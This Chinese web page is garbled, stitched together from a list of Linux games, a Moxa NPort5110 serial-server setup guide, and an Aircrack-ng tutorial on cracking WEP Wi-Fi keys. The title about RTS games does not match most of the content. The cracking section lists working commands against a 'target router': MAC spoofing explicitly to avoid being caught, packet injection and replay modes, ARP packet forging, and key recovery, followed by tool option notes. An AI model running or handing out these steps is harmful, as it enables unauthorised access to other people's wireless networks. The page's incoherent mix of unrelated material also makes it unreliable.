现在Linux下最好玩的RTS游戏是哪几个

现在Linux下最好玩的RTS游戏是哪几个,第1张

虽然说到游戏windows是一个比linux更好的平台,但是linux下也是有不少制作精良的游戏的

《韦诺之战》是一款开放源代码、跨平台的回合制策略游戏。

韦诺之战其实就是一款战旗游戏,但是其有随机性,每个单位在不同的地方有不同的概率闪避对方的攻击,每个单位还会具有不同的特质,这些都会给游戏带来不少趣味。

此外,游戏里的音乐也非常精良,虽然是一款开源的游戏,但是质量足以与商业游戏媲美。

Nexuiz【更名为 xonotic】

Nexuiz是一个三维第一人称射击游戏,游戏引擎为DarkPlaces,修改自雷神之锤引擎,它的游戏源代码在GNU通用公共许可证许可下发布。

Tux Racer

这是一个非常轻松有趣的游戏。

游戏中,玩家控制Tux从满是冰雪的山坡上滑下,并不断收集分布在路旁的鱼。在冰上滑行可以让Tux走得更快,在雪上滑行则更易 *** 作,而在岩石路上滑行会让Tux减速。路上有树会阻挡Tux的去路,还会有旗子标明滑行方向。

Warzone2100

它是一个未来背景的即时战略游戏。科技树中包含400多种组件,首创单位组合概念,各种车辆都可以从部件整合设计。支持单机任务和联机游戏。因为2004年的公开源代码,使得开发持续进行,出现了新的活力,也使得其拥有跨平台能力。

TORCS

The Open Racing Car Simulator(TORCS)是一款开源3D赛车模拟游戏。是在Linux *** 作系统上广受欢迎的赛车游戏。有50种车辆和20条赛道,不错的视觉效果。【就是控制不好方向】

FooBillard

FooBillard 是免费的OpenGL台球游戏。首先支持Linux,有人移植到Mac OS X和Windows。拥有真实的物理引擎和AI,大部分台球的玩法都提供

好了也就介绍这么多了

我们用一条交叉网线把NPort5110 和PC机的网口连接起来,并把NPort上电。

首先,打开控制面板,网络连接。

在本地连接上点右键,选择属性。

双击进入 Internet协议(TCP/IP),点击“使用下面的IP地址”

写入 IP 地址和子网掩码,记住要和NPORT 的IP 地址在同一子网段内。如NPORT 默认IP

为192.168.127.254,255.255.255.0;就需要把PC 机的IP 地址设为192.168.127.XXX,

255.255.255.0,最后一个数字不同即可。

点击确定。

第二章:网络和串口参数配置

搜索 NPort

打开NPort Administrator(可以在光盘的对应位置找到这个软件,安装好),点击Search,此

时请确认网络防火墙已经关闭。

会搜索到我们的NPort5110,点击stop,停止搜索。

网络参数配置

双击右边空白处的NPort 设备,会出现以下界面,点击选择Network 选项卡,点击Modify

修改。可以看到以下界面:

我们可以在里面修改NPort的以下参数:

IPAddress:IP地址。

Netmask:子网掩码。

Gateway:网关。

IP Configuration:可以配置为静态IP(Static),或者为DHCP(动态IP)。

DNS Server1和2:DNS,域名解析服务器。

串口参数配置

点击 Serial选项卡,点击Modify修改,双击端口进去,可以看到以下界面:

我们可以在里面修改以下参数:

Baud Rate:波特率,NPort5000 系列只能支持标准波特率,如9600,115200bps 等。

Parity:校验。

None:无校验

Even:偶校验。

Odd:奇校验。

Space:空。

Mark:标志。

Data Bits:数据位。

Stop Bits:停止位。

Flow Control:流量控制。

None:无流量控制。

XON/XOFF:软件流控。

RTS/CTS:硬件流控。

FIFO:64bit先进先出,为了降低CPU负载,提高设备性能。可以选择Enable启用,或Disable

禁用。

Interface:可选择RS232,RS422,RS485 2线,或者RS485 4线。(NP5110 只能为RS232)

设置好后,点击OK,设置保存,设备重新启动。

第三章: *** 作模式设置

Real COM映射端口

打开 NPort Administrator(可以在光盘的对应位置找到这个软件,安装好),点击Search,此

时请确认网络防火墙已经关闭。

会搜索到我们的NPort5110,点击stop,停止搜索。

双击右边的5110,选择Operating Mode选项卡,确认为Real COM模式:

点击左边的第四项:COM MAPPING,

再点击Add

点击“OK”,

点击“Apply”保存

点击“Yes”,点击“OK”。

这样,端口就映射好了。

TCP Server模式的设置(用软件)

打开 NPort Administrator(可以在光盘的对应位置找到这个软件,安装好),点击Search,此

时请确认网络防火墙已经关闭。

会搜索到我们的NPort5110,点击stop,停止搜索。如果打开防火墙,可以使用Search IP,

在下面选项框里输入NPort的IP地址,

点击 OK,就可以搜索到NPort设备。

双击右边的NP5110,切换到OperatingMode选项卡,点击Modify,双击进去。可以把模式

修改成TCP Server 模式。

里面的名词解释:

Local TCP Port:本地数据端口,指的是NP5110 的数据端口。

Command Port:NP5110 的命令端口。

Max Connection:最大连接数,也就是说同时最大可以有几台上位机采集到下面串口设备

的数据,NPort5000 系列最大是4 个,NPort6000 和CN2600 系列是8 个。

当最大连接数为2 或以上的时候,右边的选项Allow Driver Control 和Ignore Jammed IP会开

启。

Allow Driver Control:当最大连接数为2 或以上时,且此功能打开时,上位机A 需要以

4800bps打开串口,上位机B需要以9600bps打开串口,是可以的。如果此功能关闭,则波

特率需以固件中的设置一致。

Ignore Jammed IP:当最大连接数为2 或以上时,且此功能打开时,其中一台上位机A死

机,上位机B 依然可以正常接收数据。如果此功能关闭,则上位机B 也不能收到串口的数

据了。

Aircrack-ng系列工具也有Windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 Windows 从Linux 了,另外 Windows 下扫描到的 AP 也比 Linux 下少了很多。其实 Windows 并不完整的支持 TCP/IP 协议族,有些协议Windows 直接丢弃不用。网络本来从一开始就是 Unix 的天下,Windows 只是在后来加入了网络的功能。

Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:

airmon-ng 处理网卡工作模式

airodump-ng 抓包

aircrack-ng 破解

aireplay-ng 发包,干扰

另外还要用到以下 linux 命令:

ifconfig 查看修改网卡状态和参数

macchanger 伪造 MAC

iwconfig 主要针对无线网卡的工具 (同 ifconfig)

iwlist 获取无线网络的更详细信息

另外还有其他的 linux 基本命令,我就不提示了。

具体破解步骤:

1. 修改无线网卡状态:先 dow

2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能

3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡

4. 修改无线网卡状态: up

5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标

6. 监听抓包:生成 .cap 或 .ivs

7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解

Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等

ifconfig -a

ifconfig -a ath0 up

airmon-ng start wifi0 6

airodump-ng --ivs -w 目标路由器IVS文件 -c 6 ath1

airodump-ng ath1

aireplay-ng -1 0 -e 目标路由器SSID -a 目标MAC -h 本机MAC ath1

----------- -2 Crack Mode-----------

aireplay-ng -2 -p 0841 -c ffffffffffff -b 目标MAC -h 本机MAC ath1

----------- -3 Crack Mode-----------

aireplay-ng -3 -b 目标MAC -h 本机MAC ath1

----------- -4 Crack Mode-----------

aireplay-ng -4 -b 目标MAC -h 本机MAC ath1

packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp

aireplay-ng -2 -r MyArp -x 256 ath1

----------- -5 Crack Mode-----------

aireplay-ng -5 -b 目标MAC -h 本机MAC ath1

packetforge-ng -0 -a 目标MAC -h 本机MAC -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp

aireplay-ng -2 -r MyArp -x 256 ath1

-----------Crack Key-----------

aircrack-ng -n 64 -b 目标MAC 目标路由器IVS文件-01.ivs

——————————————————————————————

 下面详细介绍一下各个命令的基本用法(参照命令的英文说明)

1. ifconfig

用来配置网卡,我们这里主要用来 禁用和启用 网卡:

ifconfig ath0 down

ifconfig ath0 up

禁用一下网卡的目的是为了下一步修改 MAC 。

2.macchanger

用来改变网卡的 MAC 地址,具体用法如下:

usage: macchanger [options] device

-h 显示帮助

-V 显示版本

-s 显示当前MAC

-e 不改变mac,使用硬件厂商写入的MAC

-a 自动生成一个同类型的MAC,同厂商的

-A 自动生成一个不同类型的MAC,不同厂商的

-r 生成任意MAC

-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品

-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng

启动无线网卡进入 Monitor 模式,

useage: airmon-ng <start|stop|check><interface>[channel]

<start|stop|check>启动,停止,检测

<interface>指定无线网卡

[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了

4.iwconfig

专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。

useage:iwconfig interface [options]

[essid{NN|ON|OFF}] 指定essid号 开启关闭

[nwid{NN|on|off}] 指定网络id号 开启关闭

[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型

[freq N.NNNN[K|M|G]] 指定工作频率

[channel N] 指定频道

[ap {N|off|auto}] 指定AP号 关闭/自动

[sens N] sens 号

[nick N] nick 号

[rate {N|auto|fixed}] 速率控制

[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了

[frag {N|auto|fixed|off}] 碎片控制

[enc {NNNN-NNNN|off}] 范围

[power {period N|timeout N}] 电源 频率/超时

[retry {limit N|lifetime N}] 重试 限次/超时

[txpower N{mw|dBm}] 功率 毫瓦/分贝

[commit] 处理

5.iwlist

主要用来显示无线网卡的一些附加信息,同上

useage: iwlist [interface] options

scanning 扫描

frequency 频率

channel 频道

bitrate 速率

rate 速率

encryption 加密

key 密钥

power 电源

txpower 功率

ap ap

accespoints ap

peers 直连

event 事件

6.airodump-ng

抓包工具,我最喜欢用的,详细用法如下:

usage: airodump-ng <options><interface>[,<interface>,...]

Options:

--ivs :仅将抓取信息保存为 .ivs

--gpsd :使用 GPSd

--write <prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

-w :同 --write

--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的

--update <secs>:显示更新延迟,没有用过

--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了

-h :隐藏已知的,配合上面的选项使用

-f <msecs>:跳频时间

--berlin <secs>:无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)

-r <file>:从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

Filter options:

--encrypt <suite>: 使用密码序列过滤 AP

--netmask <netmask>: 使用掩码过滤 AP

--bssid <bssid>: 使用 bssid 过滤 AP

-a : 过滤无关的客户端

默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令 *** 作:

--channel <channels>:指定频道

--band <abg>:制定带宽

-C <frequencies>:指定频率MHz

--cswitch <method>: 设置频道交换方式

0 : FIFO (default) 先进先出(默认)

1 : Round Robin 循环

2 : Hop on last 最后一跳

-s : 同上

--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

7.aireplay-ng


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/8369397.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-15
下一篇 2023-04-15

发表评论

登录后才能评论

评论列表(0条)

保存